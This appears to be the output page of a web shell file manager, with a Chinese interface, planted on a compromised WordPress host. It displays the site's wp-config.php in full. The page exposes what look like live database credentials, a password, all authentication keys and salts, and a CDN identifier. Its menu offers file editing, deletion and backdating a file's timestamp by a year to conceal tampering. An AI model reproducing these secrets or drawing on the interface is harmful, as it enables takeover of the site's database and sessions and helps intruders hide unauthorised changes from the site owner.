文件操作 - wp-config.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/rokpaw/public_html/wp-config.php
编辑文件内容
<?php define( 'WP_CACHE', false ); // Added by WP Rocket /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'rokpawdb' ); /** Database username */ define( 'DB_USER', 'rokpawdbuser' ); /** Database password */ define( 'DB_PASSWORD', 'fkTz0AJUlgimjYP6AI' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'lS9Jy(Ku;j<R9hL{R/cZaK}DX~e@nVM7&yd/S:H2/^4Ys[Fe_<BB)5jR6grBc1>d' ); define( 'SECURE_AUTH_KEY', '[Z $f1Tx4<(C4Z,ihS3`:O&;zP_4VY^ w+U3l<A,4V>~sp%O D&Md<3xP}i/7Gc9' ); define( 'LOGGED_IN_KEY', ':k)YF8uL*=C[DS:Hr2T5L6b~$|v!+6L%|xv7GQ,|F`nk1toI2v4i[X~k]meC@.<0' ); define( 'NONCE_KEY', 'z1,f|r9g_){<JM|.,=>M)E[1e<q?+6cd8<q+KHqC_CthWQqcrkh7iNgL,unCBrU7' ); define( 'AUTH_SALT', ':H!TXljle1]<Qd{-|?=95k&v98cz8pNX(3=`m[Ftr*IoXmfp#gD?~XmWWKB_]9@D' ); define( 'SECURE_AUTH_SALT', '/vS/V*~EEP1di>@F2-qcI.BIIB#nsu/3)Q}b-bLZC`w#Ppg*Ap]O4cT3cbY8,F<T' ); define( 'LOGGED_IN_SALT', 'r)l~@5&bN@N.XRqRXzk1CWmBw-O_>)&JO,#u&%oEnV!wgI1ZOf/pHsw@@Gp/=RCk' ); define( 'NONCE_SALT', '%r^4I1wyfvg,VdLR?Po<=~oYZC(w6Cs>#P7!_?4`f5JGLw|CLwZfNyYsjbL(cz~B' ); define( 'WP_CACHE_KEY_SALT', 'oVh82><C6ap?q/ywM2F&QZp{ vSx,1JD.q|yo[TL@ApT#nOb8 {F)1>G^5LlHWp{' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'FS_METHOD', 'direct' ); define( 'WP_MEMORY_LIMIT', '256M' ); define( 'CDN_SITE_ID', 'OtB8os1tjlLicvQjnU14da6L5' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件